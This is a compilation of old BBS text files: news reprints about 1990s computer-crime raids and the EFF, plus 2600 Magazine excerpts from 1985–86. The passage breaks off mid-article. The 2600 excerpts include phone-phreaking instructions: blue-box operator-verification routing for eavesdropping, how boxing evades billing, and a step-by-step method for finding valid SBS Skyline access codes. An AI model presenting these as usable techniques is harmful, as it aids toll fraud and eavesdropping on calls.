From The Dialy Oklahoman Newspaper, September 27, 1993, Page 1:

 COMPUTER PORN CASE TRIGGERS LEGAL QUESTIONS
 By David Zizzo, Staff Writer

Is talking to Anthony Davis hazardous to your health?

In a manner of speaking, that's what numerous people with computers and modems 
apparently have been worrying about since late July.  That's when Oklahoma 
City police raided Davis' software publishing firm and confiscated his 
sophisticated commercial computer bulletin board system.  Authorities allege 
Davis was selling pornographic computerized materials on CD-ROM and through 
files downloaded over phone lines.

Names of everyone who signed onto Davis' bulletin board service, those who 
downloaded or uploaded graphic files depicting sexual acts and those who 
didn't are in the hands of investigators.

After the arrest, Earl Faubion, a police officer who runs a law enforcement 
oriented computer bulletin board system, got numerous inquiries from worried 
users.  "There are a lot of people concerned," Faubion said.  Many who used 
Davis' system for months and have been asking, "Am I in trouble?" Faubion, who 
ironically channeled much of his computer system's private mail through Davis' 
system before it was shut down, tells users that's out of his area of 
expertise.

Bill Holmes, Davis' attorney, said bulletin board system operators fear their 
computers will be seized along with the electronic mail inside.

The Davis bust sent a chill throughout the national computer community, said 
Jack Rickard, editor and publisher of Boardwatch magazine, a bulletin board 
newsletter published in Littleton, Colo.  "It's causing chaos," he said.  
Rickard said Oklahoma City is being viewed "a little bit like clown city" in 
computer circles, since the explicit material Davis offered can be purchased 
in nearly every computer magazine and is carried by numerous bulletin boards.  
"This is off the shelf," he said.  "It's considered pretty mundane stuff."

Widespread availability is not a defense, however, attorney Holmes said.  The 
allegedly illegal material was contained on four read-only memory compact 
discs and represented only a fraction of information offered by Davis.

Oklahoma City police referred questions on the Davis case to the district 
attorney's office.  An assistant prosecutor handling the case referred 
questions to District Attorney Bob Macy, who did not return several phone 
calls.

The bust will test Oklahoma laws on "community standards" regarding 
pornography, said Mike Godwin, attorney for the Electronic Frontier 
Foundation.  The Washington, D.C., advocacy group is funded by donors that 
include large software companies.  "When you talk about community standards, 
who's the real community?" Godwin wonders.  "Is it the city or ... the 
community of people on-line?"

Holmes, a former Cleveland County prosecutor, calls Oklahoma's pornography law 
"an extremely broad statute." "I'm not sure it wouldn't include Playboy or 
Penthouse type publications," he said.

Legal experts say Oklahoma's law appears aimed against sale or distribution of 
pornographic material.  That leaves some to wonder whether passing a free copy 
to a friend constitutes distribution.  Part of the law also appears to make 
possession a crime, but U.S.  Supreme Court rulings have backed an 
individual's right to own such material, Holmes said.  Also, free speech 
guarantees likely would protect those who use words to describe pornographic 
acts, he said.  Explicit materials depicting children are covered under much 
stricter laws, but Davis' CDs contained no such material.

Apart from the pornography question is the issue of electronic mail seized 
with Davis' computer equipment, correspondence most legal experts say is 
protected by federal law.  Davis' computer was part of a large electronic mail 
system that shuttled messages across the country.

Critics of the bust say likely lawsuits over the mail might show the 
government "has bitten off more than it can chew." They point to a case in 
Austin where the owner of a computer won a $50,000 damage award over E-mail 
seized by the Secret Service.  The government also was liable for $1,000 for 
each user of the E-mail.  In Davis' case, that could be up to 2,000 clients, 
or $2 million.  "The city of Oklahoma City could be on the hook for that," 
Rickard said.

Critics also say police over reached in grabbing Davis' entire system, 
shutting down his pay-for-play computer service, because of four CDs.  
Prosecutors are seeking forfeiture of the system, which includes a 13 gigabyte 
memory unit and 10 high speed modems.  "They don't have to seize it any more 
than they have to seize the building when they confiscate a bookstore," said 
Godwin of the Electronic Frontier Foundation.


 <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
 <><><>                17 ARRESTED IN HIGH-TECH PHONE FRAUD              <><><>
 <><><>                 by Lee Catterall and William Green               <><><>
 <><><>                    Brought to you by Skatepunk                   <><><>
 <><><>                   CALL: THE METAL AE 201-879-6668                <><><>
 <><><>                         T.W.G.S.C.   209-526-3194                <><><>
 <><><>                         PIRATES HOLD 313-559-7199                <><><>
 <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

        HONOLULU-- It was high-tech robbery -- the theft and sale of
        long-distance telephone service.

        Seventeen people in 13 states were arrested Monday. The charge:
        conspiracy to commit access device fraud and wire fraud.
        The victims: U.S. Sprint, MCI Corp., Allnet Corp.,ITT, Tri-Tel
        Communications.

        Their loss: a reported $125 million in the past year.
        Steve Ramsay of the Secret Service said those charged sold access codes
        for $80 to $150 a month.

        An access code -- a telephone credit card number-- allows callers to
        use long-distance phone lines. Calls were billed to that card number.
        The distributors often sold one code to hundreds, maybe thousands of
        people, Ramsey said. Charged to one number in four days: $73,592.

        According to Assistant U.S. Attorney Robert Godbey: Computers were
        programmed to call the companies' long distance networks, then enter a
        creditcard number to pay for the call.

        If the number was rejected, the computer kept dialing until one was
        accepted. The successful number then was sold.

        Whoever was assinged the number, got the bill.
        "It was the miracle of technology, the computer took a simple chore and
        did it over and over and over," he said.

        The Secret Service caught them by setting up their own distributorship
        of illegal numbers -- a "sting operation" -- and "making controlled
        diliveries," Ramsey said.


-------------------------------------------------------------------------------
This appeared in the April 27, 1988 copy of USA today and was typed in on this 
date by Skatepunk! If anyone has any Information not mentioned in this article 
please tell us all!!
               Skatepunk

Article reprinted from STATES NEWS SERVICE, August 5, 1990

Author: Brooks Boliek

Showdown over computer 'crime'

Some of the nation's computer pioneers see the digital world in
which they toil as a cybernetic rangeland with its own kind of
frontier justice.  And some of them have set out to change the
system.

Their rallying cry is Operation Sun Devil and other government
probes into malfeasance by so-called computer "hackers."  These
investigations, they assert, smack of hang-em-high justice and
all to often become examples of government heavy-handedness.

"Some of the government's actions clearly weren't
constitutional," said Mitch Kapor, founder of Lotus Development
Corp. and a new software firm ON Technology in Cambridge, Mass.

Kapor, along with a small group of fellow computer pioneers,
recently announced the formation of the Electronic Frontier
Foundation, a group dedicated to protecting the rights of
computer users.  Its ultimate goal is to extend the same First
Amendment protection that the print and broadcast media enjoy to
digital communications.

"Our idea is to get people to understand the issues and not to
try and make decisions in a controversial and confrontational
atmosphere," Kapor said.

Secret Service and U.S. Justice Department spokesmen in
Washington declined to comment on Operation Sun Devil or other
computer investigations.  But they stressed that the federal
agencies are mindful of the need to protect civil rights.

"We are not just some renegade agency breaking into peoples's
computer systems,"said Secret Service Agent Rich Adams.  "We
would not be investigating if we were not mandated by Congress. 
That's why we're involved."

The foundation is pushing its goals by providing legal assistance
to computer users who become victims of what they see as overly
zealous law enforcement officials.  It also is awarding grants to
civil liberties organizations such as the Computer Professionals
for Social Responsibility in Palo Alto.

Kapor stresses that the foundation is not a defense fund for
"hackers" and does not support breaking into computer systems or
pirating software.

The foundation has already had an impact.  It recently located
defense witnesses in the government's case against computer
bulletin board operator and newsletter publisher Craig Neidorf. 
On July 27, in the middle of the trial, the government abruptly
dropped its case against Neidorf.

Neidorf was accused of interstate transportation of a stolen
BellSouth Corp. document describing its emergency 911 system, a
charge which stems from the government's investigation into a
group of hackers called the Legion of Doom.

Prosecutors dropped Neidorf's case when Sheldon Zenner, Neidorf's
attorney, showed that the information which BellSouth alleged was
proprietary could be purchased by calling an 800 number and
paying $13.

'Private police force'
Terry Gross, an attorney that aided Neidorf's defense team,
accused the government of serving as a private police force for
large corporations.

"I think it is a very serious concern that we should all have of
the government being used as a private police force for private
corporations," Gross said.  "Especially when BellSouth made a
claim that the government accepted."

The foundation contends that prosecutors, policemen and judges
must think of computer communications in the same way they think
of printed and broadcast communications.

In the eyes of foundation leaders, their main opponent is the
federal government.  Operation Sun Devil, a two-year
investigation, has so far resulted in seven arrests and some 40
computers and 23,000 disks of data.

Kapor's group draws a parallel between the Pentagon Papers case,
which involved classified government papers documenting the
history of U.S. involvement in Vietnam, and Neidorf's.  If
Neidorf had published the document in a newspaper, as The New
York Times and The Washington Post published the Pentagon Papers,
he would have been protected.

"The example they use is a good one," said Ken Wasch, executive
director of the Software Publishers Association.  If someone
printed a document on how to get into a federal facility there
would be no restrictions on publication, he explained.  "But if
you put it on a (computer) bulletin board there would be."

Complex issues
Kapor said the Secret Service, the lead investigating agency for
computer crimes, as well as the FBI and prosecutors often fail to
understand the complex issues that arise with computer crimes. 
He said law enforcement officers are like most people when it
comes to computers: uninformed.

Kapor believes that people are afraid of computers because they
don't understand them.  To minimize the misunderstanding, the
foundation wants to educate law enforcement officers, judicial
officers and the public about digital communications.  

"There is a hugh gap between where most of us regular folk are
today and where the technology is," Kapor said.

Feds claim expertise
Secret Service agent Adams disputed the notion that federal
officials lack computer expertise.  The service has been
investigating  computer crimes since 1984, he said.

"I think it's just the opposite is true," Adams said.  "We are
very effective in our investigations and if we didn't have the
expertise we wouldn't be as effective."

Adams acknowledged that a lack of manpower means his agency must
pick and choose what to investigate.

"They (the EFF) would lead you to believe that we are out there
cracking everyone's computer system and looking into every
bulletin board," he said.  "We simply do not have the manpower to
do that.  We pinpoint the large dollar losses and those are the
ones we investigate."

At least one member of Congress has expressed some concern over
the government's crackdown on computer crime.  Sen. Patrick
Leahy, D-Vt., wants to change the Computer Fraud and Abuse Act of
1986 to prevent the government from going too far.  Neidorf was
indicted under the law.

"As far as I can tell all he did was republish a document in
Phrack (his newsletter)," Leahy said during a hearing on the
issue.  "That's not a heck of a lot different than someone
walking down the street who picks up a document and writes a
letter to the editor."

The Neidorf case has disturbed Leahy, who said he is face with
the nettlesome problem of balancing the need for computer
security with individual rights.

"We know people work very hard to create products with their
computers," he said.  "They ought to be able to protect those. 
At the same time, I don't want to see the mass resources of the
United States Justice Department turned loose on things that
don't make that much difference."
 


  2600260026002600260026002600260026002600260026002600260026002600260026002600
  2600                                                                    2600
  2600            Excerpts from Various Issues of 2600 Magazine           2600
  2600                                                                    2600
  2600                    Brought to you by:  The Fixer                   2600
  2600                                                                    2600
  2600     Call: The Private Sector 201-366-4431                          2600
  2600           The Metal AE 201-879-6668                                2600
  2600           BC Tel Phone Mart 604-658-1586                           2600
  2600           Tommy's Holiday Camp 604-595-0085                        2600
  2600           The Neutral Zone BBS/AE (it's BACK!!) 604-478-1363       2600
  2600                                                                    2600
  2600260026002600260026002600260026002600260026002600260026002600260026002600


A note before I get on with it: This file is for those of you who, for whatever
reason, do not or have not read 2600 magazine.  This issue of this file covers
the best short articles from September 1985 to August 1986.
Anyways, why bother waiting for me to type this stuff up?  Why not do as I do
and get a subscription?  All you have to do is send $12 to 2600, Box 752,
Middle Island NY 11953-0752.  Call them voice at 516-751-2600 or call the 2600
BBS, THE PRIVATE SECTOR, at 201-366-4431.  The things they need most are money
and articles, they can get money by more subscribers but they need YOU to write
GOOD articles on hacking, phreaking, etcetera in order to keep going.

  2600260026002600260026002600260026002600260026002600260026002600260026002600

::::August 1985::::
-------------------------------------------------------------------------------

2600 A Hacking Victim...

When we received our June SBS Skyline bill, we were a bit surprised.  Over six
hundred dollars of it came from calls we never made.  But what's really
interesting is the way that the Skyline people handled it.  In early June, we
got a call telling us that their sophisticated equipment detected hackers
trying to guess a code by scanning numerically.  They said our code would soon
be discovered, so they were going to give us a new one, with two extra digits
added.  They did this and that very day our old code was inactivated.  The
illegal calls had occurred BEFORE that day, and we figure Skyline must have
known this.  Maybe they thought that 2600, in our corporate clumsiness, would
pay a huge bill without investigation.  Many big companies would.  Gotta give
them credit for trying.
When we called up about it, they didn't want to handleit over the phone!  "Send
the bill through the mail," they said.  Mark the calls you made and we'll
deduct the rest."  Why are phone companies so afraid to do things over the
phone?
As long as Skyline decided to give the "perpetrators" some extra time before
the investigation starts,  we figure we might as well lend a hand too.  Our old
code was 880099.  We loved that code and are very upset at losing it.  Our new
eight digit one is very difficult to remember and nowhere near as fun.
And one last note about those new eight digit numbers.  Phone phreaks have
ALREADY figured out a way around them.  If you dial the first six digits of an
eight digit code, then the ten digit phone number and hit a # key, you'll get
your tone back!  That means there are only a hundred possible codes since there
are only two more digits to figure out  and one of them DEFINITELY works!  If
you enter six digits that are not part of an eight digit code, and then a ten
digit phone number, you'll get an error message immediately or that fake
carrier tone Skyline loves to send out.  That tone, incidentally, is for you
hackers with Apples and Commodores that scan all night long looking for the
code that will get you through to a number that responds with a carrier tone.
In the morning, you see how many carrier detects you got and which codes got
them for you.  Skyline's idea is that if EVERY invalid code gives a hacker a
carrier tone, there is no way for a computer to separate the good codes from
the bad ones.  Come on!  How about setting your computer to dial a NON-carrier
and telling it to print out only those codes that DIDN'T get a carrier tone?
And there are probably a hundred more ways.  Big corporations can be SO much
fun.

-------------------------------------------------------------------------------

::::September 1985::::

Reaching Out On Your Own
by Forest Ranger

Verification is a very touchy subject.  The telephone company wants to keep
verification secret from anyone beyond telco employees.  But as phone phreaks
should know that is quite impossible.  There are two types of operators that do
verifications.  "0" (TSPS) for local verifications and IO (INWARD) operators
for verifications beyond your NPA.  They use their operator console, but other
people use blue boxes.

                           KP:NPA+0+XX+NPA+XXX+XXXX:ST

The first NPA (area code) is yours and the 0 will get you on your TSPS
operator lines.  The next XX part is an area identifier.  They are 00,11,22,
33,44,55,66,77,88,99.  There are ten possible choices depending on which area
you are in.  For example, blue box verification for Michigan would be 
KP:313+0+66+NPA+XXX+XXXX:ST.  The second NPA is the NPA of the number you are
going to verify.  The XXX+XXXX part is the rest of the number you are going to
verify.
Once you have routed your verification you will receive a series of clicks
(tandems stacking), the you will hear a beep and you will be on the line.
You won't understand what anyone is saying because everything is scrambled.
The verification will last about thirty seconds.  Then you will be beeped out
and finally disconnected.
Federal laws regarding line listening have become much stronger - especially
after 1974 when a subcommittee of the House of Representatives held a public
hearing called "Telephone Monitoring Practices by Federal Agencies".  At this
hearing it was discovered that Bell had listened in to lines of their employees
and had the power to listen in on anyone.  This shocked many people and made
federal laws concerning such activity much stronger.  My point is don't abuse
this verification, because all you need is a simple descrambler from Radio
Shack to descramble the conversation on the line.

-------------------------------------------------------------------------------

::::November 1985::::

The History of ESS
by Lex Luthor

Of all the new 1960's wonders of telephone technology - satellites,
ultra-modern Traffic Service Positions (TSPS) for operators, the picturephone,
and so on - the one that gave Bell Labs the most trouble was, and unexpectedly
became the greatest development effort in Bell System's history, was the
perfection of an electronic switching system, or ESS.  ESS should be well known
to many a technical enthusiast.  It is known as the big brother of the phone
system, capable of controlling almost all aspects of any phone call and keeping
track of calling patterns.  How ESS works and what it is capable of has been
covered previously in 2600 (February, 1984) and will be covered in future
issues.
It may be recalled that such a system was the specific end in view when the
project that had culminated in the invention of the transistor had been
launched back in the 1930's.  After successful accomplishment of that planned
miracle in 1947-48, further delays were brought about by financial strategy and
the need for further development of the transistor itself.   In the early
1950's, a Labs team began serious work on electronic switching.  As early as
1955, Western Electric became involved when five engineers from the Hawthorne
works were assigned to collaborate with the Labs on the project.  The
president of AT&T in 1956 wrote confidently, "At Bell Labs, development of the
new electronic switching system is going full speed ahead.  We are sure this
will lead to many improvements in service and also to greater efficiency.  The
first trial will start in Morris, Illinois in 1959.".  Shortly thereafter,
Kappel said that the cost of the whole project would probably be $45 million.
But it gradually became apparent that the development of a commercially usable
electronic switching system - in effect, a computerized telephone
exchange - presented vastly greater technical problems than had been
anticipated, and that, accordingly, Bell Labs had vastly underestimated both
the time and the investment needed to do the job.  The year 1959 passed without
the promised first trial at Morris, Illinois; it was finally made in November
1960, and quickly showed how much more work remained to be done.  As time
dragged on and costs mounted, there was concern at AT&T and something
approaching panic at Bell Labs.  But the project had to go forward; by this
time the investment was too great to be sacrificed, and in any case, forward
projections of increased demand for telephone service indicated that within a
few years a time would come when, without the quantum leap in speed and
flexibility that electronic switching would provide, the national network would
be unable to meet the demand.  In November 1963, an all-electronic switching
system went into use at the Brown Engineering Company at Cocoa Beach, Florida.
But this was a small installation, essentially another test installation,
serving only a single company.  Kappel's tone on the subject in the 1964 annual
report was almost apologetic: "Electronic switching equipment must be
manufactured in volume to unprecedented standards of reliability...To turn out
the equipment economically and with good speed, mass production methods must
be developed; but, at the same time, there can be no loss in precision...."
Another year and millions of dollars later, on May 30, 1965, the first
commercial electronic central office was put into service at Succasunna, New
Jersey.
Even at Succasunna, only 200 of the town's 4300 subscribers initially had the
benefit of electronic switching's added speed and additional services, such as
provision for three party conversations and automatic trasnfer of incoming
calls.  But after that, ESS was on its way.  In January 1966, the second 
commercial installation, this one serving 2900 telephones, went into service in
Chase, Maryland.  By the end of 1967 there were additional ESS offices in
California, Connecticut, Minnesota, Georgia, New York, Florida, and
Pennsylvania; by the end of 1970 there were 120 offices serving 1.8 million
customers; and by 1974 there were 475 offices serving 5.6 million customers.
The difference between conventional switching and electronic switching is the
difference between "Hardware" and "Software"; in the former case, maintenance
is done on the spot, with screwdriver and pliers, while in the case of
electronic switching, it can be done remotely, by computer, from a central
point, making it possible to have only one or two technicians on duty at a time
at each switching center.
The development program, when the final figures were added up, was found to
have required a staggering four thousand man-years of work at Bell Labs and to
have cost not $45 million but $500 million!





Dear 2600:

   Is it true that Blue Boxing is on the way out?  I hear it has something to
do with CCIS.  What exactly is this and why is it so troublesome to phreaks?

                                                                Worried Phreak


Dear Worried:

   Blue Boxes are indeed a dwindling resource.  But there's no need to throw
them out yet.  They aren't going to be totally useless for quite some time.
   Basically, AT&T is converting to CCIS trunks.  These don't allow boxing.
   In-band signaling is the only kind of trunk sugnaling that supports boxing.
It is by far the most prevalent at the moment.  Basically, in-band uses a 2600
hertz tone to indicate that a trunk is idle, and thus can accept routing 
instructions from an "outsider".
   To box a call, the criminal blasts 2600 down the line after making a long
distance call.  The line thinks it's idle and waits for routing instructions.
Now the criminal puts a KP tone and a ST tone around the number that he's
trying to get through to.  These comprise the routing instructions.  Thus, the
line thinks it's idle, then it receives the routing instructions, and routes
the call to whereever the person sent it.  Now, his central office (CO) which
does all the billing still thinks he is making the call to wherever, so it
keeps billing him at that rate.  If it happens to think he was making a
toll-free call, it won't bill him at all!
   Another form of signaling is out of band.  This uses control tones out of
the normal band of telephoone transmission (approximately 800 hertz to 3000
hertz).  The idle tone is 3200, others shifted upward as well.  So why couldn't
you make a new box?  Don't forget, it's out of band.  These tones aren't in
normal transmission, so the local CO and customer interface loop just don't
bother to transmit them.  You can blast all the 3200 you want - it won't go
through the CO to the trunk.  But this is not the "death of boxing" as it has
several disadvantages to the telco too numerous to mention.
   The real death of boxing lies in Common Channel Interoffice Signaling
(CCIS).  This is a direct connect data line going from one ESS switcher to
another at speeds up to 4.8 kB (usually 1.2) - incredible speeds.  All
routing instructions are sent through these lines.  It isn't looking for
control tones on the trunk; it's getting them elsewhere.  This means that you
can blast 2600 hertz tones all you like.  It won't make a difference because
the equipment is no longer listening for them.  This kind of signaling is being
phased in all over the country.  Look for one in your neighborhood.
   Since CCIS has benefits for really high volume trunks, you can try looking
for long distance trunks to Canada, or rural states.  These probably won't be
phased in for a long time, if at all.  (Remember, very few companies just
invest in new technology for new tech's sake; even AT&T won't be able to do
this for long).






The Early Phreak Days
by Jim Wood

   When I decided to get married back in 1962, I traded my DJ and broadcasting
odd jobs for one at the phone company; employment which, at the time, was
ultimately secure though my take-home pay was about $300 a month.
   Assigned to the Palo Alto, California central office as a Toll
Transmissionman, my duties included maintenance of toll traffic circuits and
related short-haul N and ON carrier equipment.  Circuit testing was initiated
at a black bakelite Type 17B Toll Testboard.  A field of several hundred jacks
gave access to as many inter-office trunks, many to the San Jose 4A and
Oakland 4M 4-wire switching centers.
   Though it was strictly forbidden, one could easily and safely "deadhead"
toll calls for one's self, family, or friends from the testboard.  Around
Christmastime our office could easily have been confused with the Operator room
on the floor below.
   The 17B testboard had a 0-9, DTMF keypad arranged in two rows of 5 buttons
wired to the central office "multifreq" supply.  A rack of vacuum tube L/C
oscillators comprised the MF supply and was buried somewhere in the bowels of
the building.
   Long days with too much (mostly union) staff and not enough to do
precipitated a lot of screwing around on the job.  Some of these guys would
just daydream out the windows, others would hassle and torment the Operators
downstairs.  One favorite trick was to sneak into the access space behind the
bank of 3C switchboards and push the cords slowly up towards the Operators.
The screams and commotion caused by a tip, ring, and sleeve "snake" was worth
the risk of getting chewed out by the old battleaxe who ran the place.  Myself,
I just played with the Bell System; never with any intent to defraud, merely
to increase my understanding of how the whole thing worked.
   It was a singularly dull day that I hit on the idea of "deadheading" calls
through one of the local subscriber loop jacks which rang into the testboard.
Sure enough, I could rotary-dial through the step office to Sacramento (the
shortest hop on L carrier with inband signalling), "dump" the call in
Sacramento with a blast of 2600 fromthe 19c oscillator mounted overhead, then
multifreq out of Sacramento anywhere I wanted to go.  Wow!  I could hardly wait
to demonstrate this potential source of lost revenues to my first-line
supervisor.  Both he and his boss were mildly impressed, but assigned minimal
importance to the event, since, in their words, "no one has a multifreq supply
at home."
   Ma Bell invented the transistor but was among the last to put it into
service.  One of the few places a transistor was used was used in our office
was in the alarm circuit of the ON carrier system.  The 13H was a wretched
little "top hat" PNP with just enough beta to work in a bridged-T oscillator
configuration.  A half-dozen of these, some Olson Radio pushbuttons, and a 
handful of resistors and caps made a dandy MF supply.
   The next demonstration was from the Chief's own desk and did finally raise
some concern.  I was asked to "donate" the box and told to keep the findings
strictly to myself.  I have done so for 20 years now.

-------------------------------------------------------------------------------

::::February 1986::::

It Could Happen To You!

   A bizarre story is unfolding in New York City, one which typifies both
hacker ingenuity and corporate indifference to the average customer.
   It all started when Hacker A met Hacker B on a loop somewhere.  At first,
they got along quite well, exchanging all kinds of information.  Over time,
however, Hacker B got more and more obsessed, while Hacker A wanted to get on
with a normal life.  B would not stop calling A, which led A to tell B that if
he didn't stop bothering him, he would get the authorities on his case.  Well,
B didn't and A did.  And that's where the trouble really started.
   For the last couple of years, almost every few minutes, A's phone has been
ringing.  At the other end is B or someone or something that B has programmed.
Sometimes nothing is said; sometimes a threat is uttered; sometimes the caller
just laughs.  A and his family have been trying, literally for years, to put an
end to this.  At first they simply changed the number to an unlisted one.
Within an hour, B had found the new one.  So they tried to change it again.
New York Telephone refused.  Either they would have to pay an exorbitant fee
this time, or the number would not be changed.  They said it was impossible for
somebody to find out their number so fast - he must have been told by somebody
in the family.
   This scene was repeated a number of  times, with A's family changing their
number practically a dozen times and having to pay the fee for most of them.
It reached the point where B would call them BEFORE they received their new
number to tell them what the new number would be.
   This wasn't all.  B had also managed to charge outrageous amounts to the
family's phone bill.  He would call their answering machine collect on a long
distance trunk and make it sound to the operator as though he'd said "yes".
then he'd leave the connection open for hours.  He also managed to place third
party calls, using their number as the billing number.  Their bill was
outrageous and the phone company insisted that they were responsible for it.
Their service was disconnected and today they are slowly paying back the huge
debt.
   Meanwhile, A has tried to get the authorities to look at B (whose address
and phone number he has), with only lukewarm interest.  The FBI says it has
an eye on him, but won't help A deal with the phone company.
   To this day it continues.  The calls keep coming and A is powerless to do
anything.  B knows the phone system like the back of his hand and he can make
it do almost anything.  The phone company does not want to admit this and, on
many levels, isincapable of understanding it themselves.  The result: an
innocent victim gets it from both ends.


-------------------------------------------------------------------------------

::::May 1986::::

The SBS/Skyline Algorythm
by Nynex Phreak

SBS Skyline has one of the easiest methods of finding codes of all of the long
distance companies.  It's very similar to the old Sprint bug which allowed
people to find codes very quickly, even without the use of a computer.
To see how this methodd works, access SBS Skyline at their equal access number
(950-1088).  Enter six digits.  These are the six digits you are "betting" on
to be part of a valid code.  After the six digits, enter five other numbers
(it's not important what numbers they are).  If you hear a ring immediately
after the last number, followed by "Message MS2", the six digits are part of
a valid code.  If you don't hear a ring, hit the pound sign (#) key.  If you
get your tone back, the six digits were not part of a valid code.  You can try
a new six digit series without having to hang up and redial.  This is what
makes this method so fantastically easy.  (If you don't get your tone back
after hitting the pound sign and also don't get "Message MS2", chances are
you've stumbled across one of those SBS toll-free numbers.  This might also be
the case if you get "Message MS2" before entering five additional numbers.)
After finding a working set of six digits, all that must be done is to
find the next one or two numbers of the code.  Enter the six digit code,
followed by an additional one number to guess, followed by four random
digits.  If it rings and gives "Message MS2", this is not the right guess.
You must hang up and redial Skyline for each unsuccessful attempt at this
point.  If it doesn't ring, and you can get the tone back by hitting the pound
sign, you have found a seven digit code.  If you try all the numbers from zero
to nine and they all give "Message MS2", then you have two digits to
guess--your six digits are actually part of an eight digit code.  The same
method must be used, except your range is now from 00 to 99.

-------------------------------------------------------------------------------


(>View:101 BCTEL TOLL SECURITY BUGS


(just kidding folks, I wish there WAS such a file...)


       -=( The FIXER )=-


 Subject: Reports of "Raid" on 2600 Washington Meeting 11/09/92
From: newsbytes@clarinet.com
Date: 9 Nov 92 20:51:16 GMT
 
WASHINGTON, D.C., U.S.A., 1992 NOV 9 (NB) -- The publisher of
a well-known hacker magazine claims a recent meeting attended by
those interested in the issues his magazine raises was disrupted 
by threats of arrest by security and Arlington, Virginia 
police officers.
 
Eric Corley, also known as "Emmanuel Goldstein," editor and publisher 
of "2600 Magazine: The Hacker Quarterly," told Newsbytes that the
meeting was held November 6th at the Pentagon City Mall
outside Washington, DC was disrupted and material was confiscated
in the raid.
 
2600 Magazine promotes monthly meetings of hackers, press, and other 
interested parties throughout the country. The meetings are held in public 
locations on the first Friday evening of the month and the groups often 
contact each other by telephone during the meetings. 
 
Corley told Newsbytes that meetings were held that evening in New 
York, Washington, Philadelphia, Cambridge, St. Louis, Chicago, 
Los Angeles and San Francisco. Corley said, "While I am sure that 
meetings have been observed by law enforcement agencies, this is 
the only time that we have been harassed. It is definitely a 
freedom of speech issue."
 
According to Craig Neidorf, who was present at the meeting and was
distributing applications for membership in Computer Professionals 
For Social Responsibility (CPSR), "I saw the security officers focusing 
on us. Then they started to come toward us from a number of 
directions under what seemed to be the direction of a person with 
a walkie-talkie on a balcony. When they approached, I left the 
group and observed the security personnel encircling the group of 
about 30 gatherers. The group was mainly composed of high 
school and college students. The guards demanded to search the knapsacks 
and bags of the gatherers. They confiscated material, including CPSR 
applications, a copy of Mondo 2000 (a magazine), and other material."
 
He adds that the guards also confiscated film "from a person trying 
to take pictures of the guards. When a hacker called "HackRat" 
attempted to copy down the names of the guards, they took his 
pencil and paper."
 
Neidorf continued, "I left to go outside and rejoined the group when they 
were ejected from the mall. The guards continued challenging the group 
and told them that they would be arrested if they returned. When one of 
the people began to take pictures of the guards, the apparent supervisor 
became excited and threatening but did not confiscate the film."
 
Neidorf also said, "I think that the raid was planned. They hit right about 
6:00 and they identified our group as "hackers" and said that they knew 
that this group met every month."
 
Neidorf's story was supported by a Washington "hacker" called "Inhuman," 
who told Newsbytes, "I arrived at the meeting late and saw the group being 
detained by the guards. I walked along with the group as they were being 
ushered out and when I asked a person who seemed to be in authority his 
name, he pointed at a badge with his name written in script on it. 
I couldn't make out the name and, when I mentioned that to the person,
he said 'If you can't read it, too bad.' I did read his name, 
'C. Thomas,' from another badge."
 
Inhuman also told Newsbytes that he was told by a number of people 
that the guards said that they were "acting on behalf of the 
Secret Service." He added, "I was also told that there were two 
police officers from the Arlington County Police present but I 
did not see them."
 
Another attendee, Doug Luce, reports, "I also got to the DC 
meeting very late; 7:45 or so. It seemed like a coordinated harassment 
episode, not geared toward busting anyone, but designed to get people 
riled up, and maybe not come back to the mall."
 
Luce adds that he overheard a conversation between someone who had
brought a keyboard to sell. The person, he said, was harassed by 
security forces, one of whom said, "You aren't selling anything in 
my mall without a vendors permit!" 
 
Possible Secret Service involvement was supported by a 19 year-old 
college student known as the "Lithium Bandit," who told 
Newsbytes, "I got to the mall about 6:15 and saw the group being detained 
by approximately 5 Arlington County police and 5 security guards. When I 
walked over to see what was going on, a security guard asked me for an ID 
and I refused to show it, saying that I was about to leave. The guard 
said that I couldn't leave and told me that I had to see a police 
officer. When I did, the officer demanded ID and, when I once again 
refused, he informed me that I could be detained for up to 10 hours 
for refusing to produce identification. I gave in and produced my 
school ID which the police gave to the security people who copied 
down my name and social security number."
 
Lithium Bandit continued, "When I asked the police what was behind this 
action, I was told that they couldn't answer but that 'the Secret 
Service is involved and we are within our rights doing this."
 
The boy says he and others later went to the Arlington police station 
to get more information and were told only that there was a report 
of the use of a stolen credit card and two officers were sent to 
investigate. "They later admitted that it was 5 [officers]. While I was 
detained, I heard no mention of a credit card and there was no one 
arrested."
 
Marc Rotenberg, director of CPSR's Washington office, told Newsbytes, "I 
have really no details on the incident yet but I am very concerned 
about the reports. Confiscation of CPSR applications, if true, is 
outrageous. I will find out more facts on Monday."
 
Newsbytes was told by the Pentagon City Mall office that any information 
concerning the action would have to come from the director of security, Al 
Johnson, who was not available until Monday. The Arlington Country 
Police referred Newsbytes to a "press briefing recording" which had not 
been updated since the morning before the incident.
 
Corley told Newsbytes, "There have been no reports of misbehavior by any 
of these people. They were obviously singled out because they were 
hackers. It's as if they were being singled out as an ethnic group. I 
admire the way the group responded -- in a courteous fashion. But it 
is inexcusable that it happened. I will be at the next Washington 
meeting to insure that it doesn't happen again."
 
The manager of one of New York state's largest malls provided 
background information to Newsbytes on the rights of malls to police those 
on mall property, saying, "The primary purpose of a mall is to sell. The 
interior of the mall is private property and is subject to the 
regulations of the mall. The only requirement is that the regulations 
be enforced in an even-handed manner. I do not allow political 
activities in my mall so I could not make an exception for Democrats. 
We do allow community groups to meet but they must request space at 
least two weeks before the meeting and must have proper insurance. 
Our regulations also say that groups of more than 4 may not congregate 
in the mall."
 
The spokeswoman added that mall security can ask for identification 
from those who violate regulations and that they may be barred from the 
mall for a period of 6 months.
 
She added, "Some people feel that mall atriums and food courts are public 
space. They are not and the industry is united on this. If the malls were 
to receive tax benefits for the common space and public service in snow 
removal and the like, it could possibly be a public area but malls are taxed 
on the entire space and are totally private property, subject to their own 
regulations. If a group of 20 or more congregated in my mall, they would 
be asked to leave."
 
(Barbara E. McMullen & John F. McMullen/19921107)
 
 
Subject: Secret Service Role Questioned in "2600 Washington Raid" 11/10/92
From: newsbytes@clarinet.com
Date: 10 Nov 92 21:03:23 GMT
 
WASHINGTON, D.C., U.S.A., 1992 NOV 10 (NB) -- In the aftermath of an
action on Friday, November 6th by members of the Pentagon City Mall
Police and police from Arlington County, VA in which those attending a
2600 meeting at the mall were ordered from the premises, conflicting
stories continue to appear.
 
Attendees at the meeting have contended to Newsbytes that members of 
the mall police told them that they were "acting on behalf of the 
